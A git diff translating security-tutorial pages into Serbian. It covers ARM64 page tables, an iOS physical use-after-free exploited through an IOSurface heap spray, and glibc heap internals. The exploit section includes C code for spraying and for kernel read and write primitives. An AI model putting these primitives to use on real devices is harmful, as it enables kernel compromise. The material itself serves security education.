- * An L2 entry may point to an L3 table if more granular control is needed. +1. **L1 tabela stranica (Nivo 1)**: +* Svaki unos ovde predstavlja veliki opseg virtuelne memorije. +* Pokriva **0x1000000000 bajtova** (ili **256 GB**) virtuelne memorije. +2. **L2 tabela stranica (Nivo 2)**: +* Unos ovde predstavlja manju oblast virtuelne memorije, specifično **0x2000000 bajtova** (32 MB). +* L1 unos može ukazivati na L2 tabelu ako ne može da mapira celu oblast sam. +3. **L3 tabela stranica (Nivo 3)**: +* Ovo je najfiniji nivo, gde svaki unos mapira jednu **4 KB** stranicu memorije. +* L2 unos može ukazivati na L3 tabelu ako je potrebna preciznija kontrola. -#### Mapping Virtual to Physical Memory +#### Mapiranje virtuelne u fizičku memoriju -* **Direct Mapping (Block Mapping)**: - * Some entries in a page table directly **map a range of virtual addresses** to a contiguous range of physical addresses (like a shortcut). -* **Pointer to Child Page Table**: - * If finer control is needed, an entry in one level (e.g., L1) can point to a **child page table** at the next level (e.g., L2). +* **Direktno mapiranje (Blok mapiranje)**: +* Neki unosi u tabeli stranica direktno **mapiraju opseg virtuelnih adresa** na kontiguitet fizičkih adresa (poput prečice). +* **Pokazivač na tabelu stranica deteta**: +* Ako je potrebna finija kontrola, unos u jednom nivou (npr. L1) može ukazivati na **tabelu stranica deteta** na sledećem nivou (npr. L2). -#### Example: Mapping a Virtual Address +#### Primer: Mapiranje virtuelne adrese -Let’s say you try to access the virtual address **0x1000000000**: +Recimo da pokušavate da pristupite virtuelnoj adresi **0x1000000000**: -1. **L1 Table**: - * The kernel checks the L1 page table entry corresponding to this virtual address. If it has a **pointer to an L2 page table**, it goes to that L2 table. -2. **L2 Table**: - * The kernel checks the L2 page table for a more detailed mapping. If this entry points to an **L3 page table**, it proceeds there. -3. 
**L3 Table**: - * The kernel looks up the final L3 entry, which points to the **physical address** of the actual memory page. +1. **L1 tabela**: +* Kernel proverava L1 unos tabele stranica koji odgovara ovoj virtuelnoj adresi. Ako ima **pokazivač na L2 tabelu stranica**, prelazi na tu L2 tabelu. +2. **L2 tabela**: +* Kernel proverava L2 tabelu stranica za detaljnije mapiranje. Ako ovaj unos ukazuje na **L3 tabelu stranica**, nastavlja dalje. +3. **L3 tabela**: +* Kernel traži konačni L3 unos, koji ukazuje na **fizičku adresu** stvarne stranice memorije. -#### Example of Address Mapping +#### Primer mapiranja adrese -If you write the physical address **0x800004000** into the first index of the L2 table, then: +Ako upišete fizičku adresu **0x800004000** u prvi indeks L2 tabele, tada: -* Virtual addresses from **0x1000000000** to **0x1002000000** map to physical addresses from **0x800004000** to **0x802004000**. -* This is a **block mapping** at the L2 level. +* Virtuelne adrese od **0x1000000000** do **0x1002000000** mapiraju se na fizičke adrese od **0x800004000** do **0x802004000**. +* Ovo je **blok mapiranje** na L2 nivou. -Alternatively, if the L2 entry points to an L3 table: +Alternativno, ako L2 unos ukazuje na L3 tabelu: -* Each 4 KB page in the virtual address range **0x1000000000 -> 0x1002000000** would be mapped by individual entries in the L3 table. +* Svaka 4 KB stranica u opsegu virtuelnih adresa **0x1000000000 -> 0x1002000000** biće mapirana pojedinačnim unosima u L3 tabeli. -### Physical use-after-free +### Fizičko korišćenje nakon oslobađanja -A **physical use-after-free** (UAF) occurs when: +**Fizičko korišćenje nakon oslobađanja** (UAF) se dešava kada: -1. A process **allocates** some memory as **readable and writable**. -2. The **page tables** are updated to map this memory to a specific physical address that the process can access. -3. The process **deallocates** (frees) the memory. -4. 
However, due to a **bug**, the kernel **forgets to remove the mapping** from the page tables, even though it marks the corresponding physical memory as free. -5. The kernel can then **reallocate this "freed" physical memory** for other purposes, like **kernel data**. -6. Since the mapping wasn’t removed, the process can still **read and write** to this physical memory. +1. Proces **alokira** neku memoriju kao **čitljivu i zapisivu**. +2. **Tabele stranica** se ažuriraju da mapiraju ovu memoriju na specifičnu fizičku adresu kojoj proces može pristupiti. +3. Proces **dealokira** (oslobađa) memoriju. +4. Međutim, zbog **greške**, kernel **zaboravlja da ukloni mapiranje** iz tabela stranica, iako označava odgovarajuću fizičku memoriju kao slobodnu. +5. Kernel može zatim **ponovo alocirati ovu "oslobođenu" fizičku memoriju** za druge svrhe, poput **kernel podataka**. +6. Pošto mapiranje nije uklonjeno, proces može i dalje **čitati i pisati** u ovu fizičku memoriju. -This means the process can access **pages of kernel memory**, which could contain sensitive data or structures, potentially allowing an attacker to **manipulate kernel memory**. +To znači da proces može pristupiti **stranicama kernel memorije**, koje mogu sadržati osetljive podatke ili strukture, potencijalno omogućavajući napadaču da **manipuliše kernel memorijom**. -### Exploitation Strategy: Heap Spray +### Strategija eksploatacije: Heap Spray -Since the attacker can’t control which specific kernel pages will be allocated to freed memory, they use a technique called **heap spray**: +Pošto napadač ne može kontrolisati koje specifične kernel stranice će biti alocirane na oslobođenoj memoriji, koriste tehniku nazvanu **heap spray**: -1. The attacker **creates a large number of IOSurface objects** in kernel memory. -2. Each IOSurface object contains a **magic value** in one of its fields, making it easy to identify. -3. 
They **scan the freed pages** to see if any of these IOSurface objects landed on a freed page. -4. When they find an IOSurface object on a freed page, they can use it to **read and write kernel memory**. +1. Napadač **stvara veliki broj IOSurface objekata** u kernel memoriji. +2. Svaki IOSurface objekat sadrži **magičnu vrednost** u jednom od svojih polja, što olakšava identifikaciju. +3. Oni **skeniraju oslobođene stranice** da vide da li je neki od ovih IOSurface objekata sleteo na oslobođenu stranicu. +4. Kada pronađu IOSurface objekat na oslobođenoj stranici, mogu ga koristiti za **čitati i pisati kernel memoriju**. -More info about this in [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups) +Više informacija o ovome u [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups) -### Step-by-Step Heap Spray Process +### Korak-po-korak proces heap spray-a -1. **Spray IOSurface Objects**: The attacker creates many IOSurface objects with a special identifier ("magic value"). -2. **Scan Freed Pages**: They check if any of the objects have been allocated on a freed page. -3. **Read/Write Kernel Memory**: By manipulating fields in the IOSurface object, they gain the ability to perform **arbitrary reads and writes** in kernel memory. This lets them: - * Use one field to **read any 32-bit value** in kernel memory. - * Use another field to **write 64-bit values**, achieving a stable **kernel read/write primitive**. - -Generate IOSurface objects with the magic value IOSURFACE\_MAGIC to later search for: +1. **Spray IOSurface objekata**: Napadač stvara mnogo IOSurface objekata sa posebnim identifikatorom ("magična vrednost"). +2. **Skeniranje oslobođenih stranica**: Proveravaju da li su neki od objekata alocirani na oslobođenoj stranici. +3. 
**Čitanje/Pisanje kernel memorije**: Manipulacijom polja u IOSurface objektu, stiču sposobnost da izvrše **arbitrarna čitanja i pisanja** u kernel memoriji. Ovo im omogućava: +* Da koriste jedno polje za **čitati bilo koju 32-bitnu vrednost** u kernel memoriji. +* Da koriste drugo polje za **pisanje 64-bitnih vrednosti**, postizajući stabilnu **kernel read/write primitivu**. +Generišite IOSurface objekte sa magičnom vrednošću IOSURFACE_MAGIC za kasnije pretraživanje: ```c void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) { - if (*nClients >= 0x4000) return; - for (int i = 0; i < nSurfaces; i++) { - fast_create_args_t args; - lock_result_t result; - - size_t size = IOSurfaceLockResultSize; - args.address = 0; - args.alloc_size = *nClients + 1; - args.pixel_format = IOSURFACE_MAGIC; - - IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size); - io_connect_t id = result.surface_id; - - (*clients)[*nClients] = id; - *nClients = (*nClients) += 1; - } +if (*nClients >= 0x4000) return; +for (int i = 0; i < nSurfaces; i++) { +fast_create_args_t args; +lock_result_t result; + +size_t size = IOSurfaceLockResultSize; +args.address = 0; +args.alloc_size = *nClients + 1; +args.pixel_format = IOSURFACE_MAGIC; + +IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size); +io_connect_t id = result.surface_id; + +(*clients)[*nClients] = id; +*nClients = (*nClients) += 1; +} } ``` - -Search for **`IOSurface`** objects in one freed physical page: - +Pretražite **`IOSurface`** objekte u jednoj oslobođenoj fizičkoj stranici: ```c int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) { - io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000); - int nSurfaceIDs = 0; - - for (int i = 0; i < 0x400; i++) { - spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs); - - for (int j = 0; j < nPages; j++) { - uint64_t start = puafPages[j]; - uint64_t 
stop = start + (pages(1) / 16); - - for (uint64_t k = start; k < stop; k += 8) { - if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) { - info.object = k; - info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1]; - if (self_task) *self_task = iosurface_get_receiver(k); - goto sprayDone; - } - } - } - } - +io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000); +int nSurfaceIDs = 0; + +for (int i = 0; i < 0x400; i++) { +spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs); + +for (int j = 0; j < nPages; j++) { +uint64_t start = puafPages[j]; +uint64_t stop = start + (pages(1) / 16); + +for (uint64_t k = start; k < stop; k += 8) { +if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) { +info.object = k; +info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1]; +if (self_task) *self_task = iosurface_get_receiver(k); +goto sprayDone; +} +} +} +} + sprayDone: - for (int i = 0; i < nSurfaceIDs; i++) { - if (surfaceIDs[i] == info.surface) continue; - iosurface_release(client, surfaceIDs[i]); - } - free(surfaceIDs); - - return 0; +for (int i = 0; i < nSurfaceIDs; i++) { +if (surfaceIDs[i] == info.surface) continue; +iosurface_release(client, surfaceIDs[i]); +} +free(surfaceIDs); + +return 0; } ``` +### Postizanje Kernel Read/Write sa IOSurface -### Achieving Kernel Read/Write with IOSurface +Nakon što postignemo kontrolu nad IOSurface objektom u kernel memoriji (mapiranim na oslobođenu fizičku stranicu dostupnu iz korisničkog prostora), možemo ga koristiti za **arbitrarne kernel read i write operacije**. -After achieving control over an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), we can use it for **arbitrary kernel read and write operations**. +**Ključna Polja u IOSurface** -**Key Fields in IOSurface** +IOSurface objekat ima dva ključna polja: -The IOSurface object has two crucial fields: +1. **Pokazivač na Broj Korišćenja**: Omogućava **32-bitno čitanje**. +2. 
**Pokazivač na Indeksirani Vreme**: Omogućava **64-bitno pisanje**. -1. **Use Count Pointer**: Allows a **32-bit read**. -2. **Indexed Timestamp Pointer**: Allows a **64-bit write**. +Prepisivanjem ovih pokazivača, preusmeravamo ih na arbitrarne adrese u kernel memoriji, omogućavajući read/write mogućnosti. -By overwriting these pointers, we redirect them to arbitrary addresses in kernel memory, enabling read/write capabilities. +#### 32-Bitno Kernel Čitanje -#### 32-Bit Kernel Read - -To perform a read: - -1. Overwrite the **use count pointer** to point to the target address minus a 0x14-byte offset. -2. Use the `get_use_count` method to read the value at that address. +Da bismo izvršili čitanje: +1. Prepišite **pokazivač na broj korišćenja** da pokazuje na ciljnu adresu minus 0x14-bajtni ofset. +2. Koristite `get_use_count` metodu da pročitate vrednost na toj adresi. ```c uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) { - uint64_t args[1] = {surfaceID}; - uint32_t size = 1; - uint64_t out = 0; - IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0); - return (uint32_t)out; +uint64_t args[1] = {surfaceID}; +uint32_t size = 1; +uint64_t out = 0; +IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0); +return (uint32_t)out; } uint32_t iosurface_kread32(uint64_t addr) { - uint64_t orig = iosurface_get_use_count_pointer(info.object); - iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14 - uint32_t value = get_use_count(info.client, info.surface); - iosurface_set_use_count_pointer(info.object, orig); - return value; +uint64_t orig = iosurface_get_use_count_pointer(info.object); +iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14 +uint32_t value = get_use_count(info.client, info.surface); +iosurface_set_use_count_pointer(info.object, orig); +return value; } ``` - #### 64-Bit Kernel Write -To perform a write: - -1. Overwrite the **indexed timestamp pointer** to the target address. 
-2. Use the `set_indexed_timestamp` method to write a 64-bit value. +Da biste izvršili pisanje: +1. Prepišite **pokazivač indeksiranog vremenskog pečata** na cilnu adresu. +2. Koristite metodu `set_indexed_timestamp` da biste napisali 64-bitnu vrednost. ```c void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) { - uint64_t args[3] = {surfaceID, 0, value}; - IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0); +uint64_t args[3] = {surfaceID, 0, value}; +IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0); } void iosurface_kwrite64(uint64_t addr, uint64_t value) { - uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object); - iosurface_set_indexed_timestamp_pointer(info.object, addr); - set_indexed_timestamp(info.client, info.surface, value); - iosurface_set_indexed_timestamp_pointer(info.object, orig); +uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object); +iosurface_set_indexed_timestamp_pointer(info.object, addr); +set_indexed_timestamp(info.client, info.surface, value); +iosurface_set_indexed_timestamp_pointer(info.object, orig); } ``` +#### Pregled Eksploatacije -#### Exploit Flow Recap - -1. **Trigger Physical Use-After-Free**: Free pages are available for reuse. -2. **Spray IOSurface Objects**: Allocate many IOSurface objects with a unique "magic value" in kernel memory. -3. **Identify Accessible IOSurface**: Locate an IOSurface on a freed page you control. -4. **Abuse Use-After-Free**: Modify pointers in the IOSurface object to enable arbitrary **kernel read/write** via IOSurface methods. - -With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices). +1. **Pokreni Fizičku Upotrebu-Nakon-Oslobađanja**: Oslobođene stranice su dostupne za ponovnu upotrebu. +2. 
**Sprej IOSurface Objekata**: Alociraj mnogo IOSurface objekata sa jedinstvenom "čarobnom vrednošću" u kernel memoriji. +3. **Identifikuj Pristupačni IOSurface**: Pronađi IOSurface na oslobođenoj stranici koju kontrolišeš. +4. **Zloupotrebi Upotrebu-Nakon-Oslobađanja**: Izmeni pokazivače u IOSurface objektu da omogućiš proizvoljno **čitanje/pisanje u kernel** putem IOSurface metoda. +Sa ovim primitivima, eksploatacija omogućava kontrolisano **32-bitno čitanje** i **64-bitno pisanje** u kernel memoriju. Dalji koraci za jailbreak mogu uključivati stabilnije primitivne operacije čitanja/pisanja, što može zahtevati zaobilaženje dodatnih zaštita (npr., PPL na novijim arm64e uređajima). diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 319126fe0..327ebfa4d 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -1,197 +1,190 @@ # Libc Heap -## Heap Basics +## Heap Osnove -The heap is basically the place where a program is going to be able to store data when it requests data calling functions like **`malloc`**, `calloc`... Moreover, when this memory is no longer needed it's made available calling the function **`free`**. +Heap je u suštini mesto gde program može da skladišti podatke kada zahteva podatke pozivajući funkcije kao što su **`malloc`**, `calloc`... Pored toga, kada ova memorija više nije potrebna, postaje dostupna pozivajući funkciju **`free`**. -As it's shown, its just after where the binary is being loaded in memory (check the `[heap]` section): +Kao što je prikazano, to je odmah nakon što se binarni kod učita u memoriju (proverite odeljak `[heap]`):
-### Basic Chunk Allocation +### Osnovna Alokacija Chunk-a -When some data is requested to be stored in the heap, some space of the heap is allocated to it. This space will belong to a bin and only the requested data + the space of the bin headers + minimum bin size offset will be reserved for the chunk. The goal is to just reserve as minimum memory as possible without making it complicated to find where each chunk is. For this, the metadata chunk information is used to know where each used/free chunk is. +Kada se zatraže neki podaci da budu smešteni u heap, određeni deo heap-a se alocira za njih. Ovaj prostor će pripadati bini i samo će zatraženi podaci + prostor bin zaglavlja + minimalni offset veličine bina biti rezervisani za chunk. Cilj je da se rezerviše što manje memorije bez otežavanja pronalaženja gde se svaki chunk nalazi. Za to se koristi informacija o metapodacima chunk-a da bi se znalo gde se nalazi svaki korišćeni/slobodni chunk. -There are different ways to reserver the space mainly depending on the used bin, but a general methodology is the following: +Postoje različiti načini za rezervaciju prostora, uglavnom zavisno od korišćenog bina, ali opšta metodologija je sledeća: -- The program starts by requesting certain amount of memory. -- If in the list of chunks there someone available big enough to fulfil the request, it'll be used - - This might even mean that part of the available chunk will be used for this request and the rest will be added to the chunks list -- If there isn't any available chunk in the list but there is still space in allocated heap memory, the heap manager creates a new chunk -- If there is not enough heap space to allocate the new chunk, the heap manager asks the kernel to expand the memory allocated to the heap and then use this memory to generate the new chunk -- If everything fails, `malloc` returns null. +- Program počinje zahtevajući određenu količinu memorije. 
+- Ako u listi chunk-ova postoji neki dostupan dovoljno veliki da ispuni zahtev, biće korišćen. +- To može čak značiti da će deo dostupnog chunk-a biti korišćen za ovaj zahtev, a ostatak će biti dodat u listu chunk-ova. +- Ako u listi nema dostupnog chunk-a, ali još uvek ima prostora u alociranoj heap memoriji, upravnik heap-a kreira novi chunk. +- Ako nema dovoljno prostora u heap-u da se alocira novi chunk, upravnik heap-a traži od kernela da proširi memoriju alociranu za heap i zatim koristi ovu memoriju za generisanje novog chunk-a. +- Ako sve ne uspe, `malloc` vraća null. -Note that if the requested **memory passes a threshold**, **`mmap`** will be used to map the requested memory. +Napomena: ako zatražena **memorija pređe prag**, **`mmap`** će biti korišćen za mapiranje zatražene memorije. ## Arenas -In **multithreaded** applications, the heap manager must prevent **race conditions** that could lead to crashes. Initially, this was done using a **global mutex** to ensure that only one thread could access the heap at a time, but this caused **performance issues** due to the mutex-induced bottleneck. +U **multithreaded** aplikacijama, upravnik heap-a mora sprečiti **trke** koje bi mogle dovesti do rušenja. U početku, to je postignuto korišćenjem **globalnog mutex-a** kako bi se osiguralo da samo jedna nit može pristupiti heap-u u isto vreme, ali to je izazvalo **probleme sa performansama** zbog uskog grla izazvanog mutex-om. -To address this, the ptmalloc2 heap allocator introduced "arenas," where **each arena** acts as a **separate heap** with its **own** data **structures** and **mutex**, allowing multiple threads to perform heap operations without interfering with each other, as long as they use different arenas. 
+Da bi se to rešilo, ptmalloc2 alokator heap-a je uveo "arene", gde **svaka arena** deluje kao **odvojeni heap** sa svojim **vlastitim** podacima **strukture** i **mutex-om**, omogućavajući više niti da obavljaju operacije na heap-u bez ometanja jedna druge, sve dok koriste različite arene. -The default "main" arena handles heap operations for single-threaded applications. When **new threads** are added, the heap manager assigns them **secondary arenas** to reduce contention. It first attempts to attach each new thread to an unused arena, creating new ones if needed, up to a limit of 2 times the number of CPU cores for 32-bit systems and 8 times for 64-bit systems. Once the limit is reached, **threads must share arenas**, leading to potential contention. +Podrazumevana "glavna" arena upravlja operacijama na heap-u za aplikacije sa jednom niti. Kada se **nove niti** dodaju, upravnik heap-a im dodeljuje **sekundarne arene** kako bi smanjio sukobe. Prvo pokušava da poveže svaku novu nit sa neiskorišćenom arenom, kreirajući nove ako je potrebno, do limita od 2 puta broja CPU jezgara za 32-bitne sisteme i 8 puta za 64-bitne sisteme. Kada se dostigne limit, **niti moraju deliti arene**, što može dovesti do potencijalnih sukoba. -Unlike the main arena, which expands using the `brk` system call, secondary arenas create "subheaps" using `mmap` and `mprotect` to simulate the heap behaviour, allowing flexibility in managing memory for multithreaded operations. +Za razliku od glavne arene, koja se širi korišćenjem `brk` sistemskog poziva, sekundarne arene kreiraju "subheaps" koristeći `mmap` i `mprotect` kako bi simulirale ponašanje heap-a, omogućavajući fleksibilnost u upravljanju memorijom za multithreaded operacije. ### Subheaps -Subheaps serve as memory reserves for secondary arenas in multithreaded applications, allowing them to grow and manage their own heap regions separately from the main heap. 
Here's how subheaps differ from the initial heap and how they operate: +Subheaps služe kao rezerve memorije za sekundarne arene u multithreaded aplikacijama, omogućavajući im da rastu i upravljaju svojim regionima heap-a odvojeno od glavnog heap-a. Evo kako se subheaps razlikuju od inicijalnog heap-a i kako funkcionišu: -1. **Initial Heap vs. Subheaps**: - - The initial heap is located directly after the program's binary in memory, and it expands using the `sbrk` system call. - - Subheaps, used by secondary arenas, are created through `mmap`, a system call that maps a specified memory region. -2. **Memory Reservation with `mmap`**: - - When the heap manager creates a subheap, it reserves a large block of memory through `mmap`. This reservation doesn't allocate memory immediately; it simply designates a region that other system processes or allocations shouldn't use. - - By default, the reserved size for a subheap is 1 MB for 32-bit processes and 64 MB for 64-bit processes. -3. **Gradual Expansion with `mprotect`**: - - The reserved memory region is initially marked as `PROT_NONE`, indicating that the kernel doesn't need to allocate physical memory to this space yet. - - To "grow" the subheap, the heap manager uses `mprotect` to change page permissions from `PROT_NONE` to `PROT_READ | PROT_WRITE`, prompting the kernel to allocate physical memory to the previously reserved addresses. This step-by-step approach allows the subheap to expand as needed. - - Once the entire subheap is exhausted, the heap manager creates a new subheap to continue allocation. +1. **Inicijalni Heap vs. Subheaps**: +- Inicijalni heap se nalazi direktno nakon binarnog koda programa u memoriji, i širi se korišćenjem `sbrk` sistemskog poziva. +- Subheaps, koje koriste sekundarne arene, kreiraju se putem `mmap`, sistemskog poziva koji mapira određeni region memorije. +2. **Rezervacija Memorije sa `mmap`**: +- Kada upravnik heap-a kreira subheap, rezerviše veliki blok memorije putem `mmap`. 
Ova rezervacija ne alocira memoriju odmah; jednostavno označava region koji drugi sistemski procesi ili alokacije ne bi trebali koristiti. +- Podrazumevana veličina rezervacije za subheap je 1 MB za 32-bitne procese i 64 MB za 64-bitne procese. +3. **Postepeno Širenje sa `mprotect`**: +- Rezervisana memorijska oblast je inicijalno označena kao `PROT_NONE`, što ukazuje da kernel ne mora da alocira fizičku memoriju za ovaj prostor još. +- Da bi "rastegao" subheap, upravnik heap-a koristi `mprotect` da promeni dozvole stranica sa `PROT_NONE` na `PROT_READ | PROT_WRITE`, podstičući kernel da alocira fizičku memoriju za prethodno rezervisane adrese. Ovaj postepeni pristup omogućava subheap-u da se širi po potrebi. +- Kada se ceo subheap iscrpi, upravnik heap-a kreira novi subheap da bi nastavio alokaciju. ### heap_info -This struct allocates relevant information of the heap. Moreover, heap memory might not be continuous after more allocations, this struct will also store that info. - +Ova struktura alocira relevantne informacije o heap-u. Pored toga, heap memorija možda neće biti kontinuirana nakon više alokacija, ova struktura će takođe čuvati te informacije. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/arena.c#L837 typedef struct _heap_info { - mstate ar_ptr; /* Arena for this heap. */ - struct _heap_info *prev; /* Previous heap. */ - size_t size; /* Current size in bytes. */ - size_t mprotect_size; /* Size in bytes that has been mprotected - PROT_READ|PROT_WRITE. */ - size_t pagesize; /* Page size used when allocating the arena. */ - /* Make sure the following data is properly aligned, particularly - that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of - MALLOC_ALIGNMENT. */ - char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK]; +mstate ar_ptr; /* Arena for this heap. */ +struct _heap_info *prev; /* Previous heap. */ +size_t size; /* Current size in bytes. 
*/ +size_t mprotect_size; /* Size in bytes that has been mprotected +PROT_READ|PROT_WRITE. */ +size_t pagesize; /* Page size used when allocating the arena. */ +/* Make sure the following data is properly aligned, particularly +that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of +MALLOC_ALIGNMENT. */ +char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK]; } heap_info; ``` - ### malloc_state -**Each heap** (main arena or other threads arenas) has a **`malloc_state` structure.**\ -It’s important to notice that the **main arena `malloc_state`** structure is a **global variable in the libc** (therefore located in the libc memory space).\ -In the case of **`malloc_state`** structures of the heaps of threads, they are located **inside own thread "heap"**. +**Svaka heap** (glavna arena ili druge arene niti) ima **`malloc_state` strukturu.**\ +Važno je napomenuti da je **glavna arena `malloc_state`** struktura **globalna promenljiva u libc** (stoga se nalazi u libc memorijskom prostoru).\ +U slučaju **`malloc_state`** struktura heap-ova niti, one se nalaze **unutar vlastitog "heap"-a niti**. 
-There some interesting things to note from this structure (see C code below): +Postoje neke zanimljive stvari koje treba primetiti iz ove strukture (vidi C kod ispod): -- `__libc_lock_define (, mutex);` Is there to make sure this structure from the heap is accessed by 1 thread at a time -- Flags: +- `__libc_lock_define (, mutex);` je tu da osigura da se ova struktura iz heap-a pristupa od strane 1 niti u isto vreme +- Zastavice: - - ```c - #define NONCONTIGUOUS_BIT (2U) +- ```c +#define NONCONTIGUOUS_BIT (2U) - #define contiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) == 0) - #define noncontiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) != 0) - #define set_noncontiguous(M) ((M)->flags |= NONCONTIGUOUS_BIT) - #define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) - ``` - -- The `mchunkptr bins[NBINS * 2 - 2];` contains **pointers** to the **first and last chunks** of the small, large and unsorted **bins** (the -2 is because the index 0 is not used) - - Therefore, the **first chunk** of these bins will have a **backwards pointer to this structure** and the **last chunk** of these bins will have a **forward pointer** to this structure. Which basically means that if you can l**eak these addresses in the main arena** you will have a pointer to the structure in the **libc**. -- The structs `struct malloc_state *next;` and `struct malloc_state *next_free;` are linked lists os arenas -- The `top` chunk is the last "chunk", which is basically **all the heap reminding space**. Once the top chunk is "empty", the heap is completely used and it needs to request more space. -- The `last reminder` chunk comes from cases where an exact size chunk is not available and therefore a bigger chunk is splitter, a pointer remaining part is placed here. 
+#define contiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) == 0) +#define noncontiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) != 0) +#define set_noncontiguous(M) ((M)->flags |= NONCONTIGUOUS_BIT) +#define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) +``` +- `mchunkptr bins[NBINS * 2 - 2];` sadrži **pokazivače** na **prvi i poslednji chunk** malih, velikih i nesortiranih **bins** ( -2 je zato što se indeks 0 ne koristi) +- Stoga, **prvi chunk** ovih bins će imati **povratni pokazivač na ovu strukturu** i **poslednji chunk** ovih bins će imati **napredni pokazivač** na ovu strukturu. Što u suštini znači da ako možete **procuriti ove adrese u glavnoj areni** imaćete pokazivač na strukturu u **libc**. +- Strukture `struct malloc_state *next;` i `struct malloc_state *next_free;` su povezane liste arena +- `top` chunk je poslednji "chunk", koji je u suštini **sva preostala memorija heap-a**. Kada je top chunk "prazan", heap je potpuno iskorišćen i treba zatražiti više prostora. +- `last reminder` chunk dolazi iz slučajeva kada tačno veličine chunk nije dostupna i stoga je veći chunk podeljen, a pokazivač preostalog dela se ovde postavlja. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1812 struct malloc_state { - /* Serialize access. */ - __libc_lock_define (, mutex); +/* Serialize access. */ +__libc_lock_define (, mutex); - /* Flags (formerly in max_fast). */ - int flags; +/* Flags (formerly in max_fast). */ +int flags; - /* Set if the fastbin chunks contain recently inserted free blocks. */ - /* Note this is a bool but not all targets support atomics on booleans. */ - int have_fastchunks; +/* Set if the fastbin chunks contain recently inserted free blocks. */ +/* Note this is a bool but not all targets support atomics on booleans. 
*/ +int have_fastchunks; - /* Fastbins */ - mfastbinptr fastbinsY[NFASTBINS]; +/* Fastbins */ +mfastbinptr fastbinsY[NFASTBINS]; - /* Base of the topmost chunk -- not otherwise kept in a bin */ - mchunkptr top; +/* Base of the topmost chunk -- not otherwise kept in a bin */ +mchunkptr top; - /* The remainder from the most recent split of a small request */ - mchunkptr last_remainder; +/* The remainder from the most recent split of a small request */ +mchunkptr last_remainder; - /* Normal bins packed as described above */ - mchunkptr bins[NBINS * 2 - 2]; +/* Normal bins packed as described above */ +mchunkptr bins[NBINS * 2 - 2]; - /* Bitmap of bins */ - unsigned int binmap[BINMAPSIZE]; +/* Bitmap of bins */ +unsigned int binmap[BINMAPSIZE]; - /* Linked list */ - struct malloc_state *next; +/* Linked list */ +struct malloc_state *next; - /* Linked list for free arenas. Access to this field is serialized - by free_list_lock in arena.c. */ - struct malloc_state *next_free; +/* Linked list for free arenas. Access to this field is serialized +by free_list_lock in arena.c. */ +struct malloc_state *next_free; - /* Number of threads attached to this arena. 0 if the arena is on - the free list. Access to this field is serialized by - free_list_lock in arena.c. */ - INTERNAL_SIZE_T attached_threads; +/* Number of threads attached to this arena. 0 if the arena is on +the free list. Access to this field is serialized by +free_list_lock in arena.c. */ +INTERNAL_SIZE_T attached_threads; - /* Memory allocated from the system in this arena. */ - INTERNAL_SIZE_T system_mem; - INTERNAL_SIZE_T max_system_mem; +/* Memory allocated from the system in this arena. */ +INTERNAL_SIZE_T system_mem; +INTERNAL_SIZE_T max_system_mem; }; ``` - ### malloc_chunk -This structure represents a particular chunk of memory. The various fields have different meaning for allocated and unallocated chunks. - +Ova struktura predstavlja određeni deo memorije. 
